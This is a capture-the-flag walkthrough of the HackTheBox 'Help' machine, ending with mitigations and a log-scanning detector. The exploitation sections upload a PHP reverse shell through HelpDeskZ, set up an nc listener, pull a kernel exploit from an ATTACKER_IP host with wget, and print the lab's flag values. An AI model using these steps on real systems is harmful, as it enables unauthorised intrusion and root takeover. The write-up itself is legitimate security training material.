htb-writeups

Help HTB - Walkthrough

Overview

This document is a walkthrough of the penetration testing process for the Help machine from HackTheBox. The path to root combines web application exploitation for initial access with a kernel exploit for privilege escalation.

Reconnaissance

Initial Scanning

export target=10.129.230.159
echo "Target IP set to: $target"

# Comprehensive port scan
sudo nmap -p- --min-rate 5000 -sT -vvv $target

# Service and version detection
sudo nmap -sC -sV -p 22,80,3000 -T4 $target

Discovered Services:

Web Application Enumeration

# Add domain to hosts file
echo "$target help.htb" | sudo tee -a /etc/hosts

Directory bruteforcing

Key Discovery: /support directory hosting HelpDeskZ application.

Vulnerability Analysis

HelpDeskZ Version Identification

The HelpDeskZ version was identified by accessing:

http://help.htb/support/readme.html

Searchsploit Research

searchsploit helpdeskz

Identified Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload (ExploitDB ID: 40300)

Exploitation

File Upload Vulnerability

  1. Download the exploit:
    searchsploit -m 40300

  2. Upload PHP reverse shell through the ticket submission form:
    http://help.htb/support/?v=submit_ticket&action=displayForm

  3. Execute the uploaded shell:

# Generate shell URL using the exploit
python2 40300.py http://help.htb/support/uploads/tickets/ shell.php

# Set up listener
nc -nlvp 9001

# Trigger the shell
curl http://help.htb/support/uploads/tickets/[GENERATED_HASH].php

Initial Access

Successfully obtained a shell as user help:

whoami
# help

cat /home/help/user.txt
# c4a45fefa1e4dcd8ddcca8777ab9ffde

Privilege Escalation

System Information Gathering

uname -a
# Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Kernel Exploitation

Vulnerability: Linux Kernel 4.4.0-116 Generic Privilege Escalation

  1. Download and compile the exploit:
# On attacker machine
python3 -m http.server

# On target machine
wget http://ATTACKER_IP:8000/44298.c -O exploit.c
gcc -o exploit exploit.c

  2. Execute the exploit:
    ./exploit

Root Access

Successfully elevated to root privileges:

whoami
# root

cat /root/root.txt
# 8df818bc2013e9b03c18234fdd0449b6

Technical Details

Vulnerabilities Exploited

  1. HelpDeskZ Arbitrary File Upload (CVE-2015-0937)
    • Impact: Remote Code Execution
    • Vector: Unrestricted file upload in ticket attachments
  2. Linux Kernel Privilege Escalation
    • CVE: Multiple vulnerabilities in Linux Kernel 4.4.0-116
    • Impact: Local Privilege Escalation to root

Key Learning Points

Mitigation Recommendations

  1. HelpDeskZ:
    • Update to latest version
    • Implement proper file upload validation
    • Restrict executable file types
  2. System Hardening:
    • Regular kernel updates and patches
    • Principle of least privilege for service accounts
    • Web application firewall implementation
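
A detection to complement the upload mitigations above, as an added example that is not part of the original walkthrough or of HelpDeskZ: it scans combined-format web server access logs for script files requested from the ticket upload directory seen in this walkthrough. The log lines are constructed samples, and the miss threshold and the list of script extensions are assumptions.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Upload directory from this walkthrough; attachments there should never run as scripts.
UPLOAD_PREFIX = "/support/uploads/tickets/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
# Combined log format: client IP, timestamp, request line, status code.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
MISS_THRESHOLD = 3  # assumed tuning value: 404s per client before flagging name guessing


def analyze(lines):
    """Return (executed, guessing): script requests served from the upload
    directory, and clients with repeated 404s on script names there."""
    executed, misses = [], defaultdict(int)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        # Decode %-escapes and collapse ./ and // so obfuscated paths still match.
        path = posixpath.normpath(unquote(m["target"].split("?", 1)[0]))
        if not (path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path)):
            continue
        status = int(m["status"])
        if 200 <= status < 300:
            executed.append((m["ip"], path))
        elif status == 404:
            misses[m["ip"]] += 1
    guessing = sorted(ip for ip, n in misses.items() if n >= MISS_THRESHOLD)
    return executed, guessing


def _line(ip, target, status):
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" {status} 512 "-" "-"'


# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    _line("203.0.113.7", "/support/?v=submit_ticket&action=displayForm", 200),
    _line("203.0.113.7", "/support/uploads/tickets/" + "a" * 32 + ".php", 404),
    _line("203.0.113.7", "/support/uploads/tickets/" + "b" * 32 + ".php", 404),
    _line("203.0.113.7", "/support/uploads/tickets/" + "c" * 32 + ".php", 404),
    _line("203.0.113.7", "/support/uploads//tickets/" + "d" * 32 + ".%70hp", 200),
    _line("198.51.100.20", "/support/uploads/tickets/" + "e" * 32 + ".png", 200),
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Any entry in the first list means the web server served a script from the attachment directory, which should be impossible once uploads are stored outside the web root or script handling is disabled for that path.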

Tools Used


This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting penetration testing activities.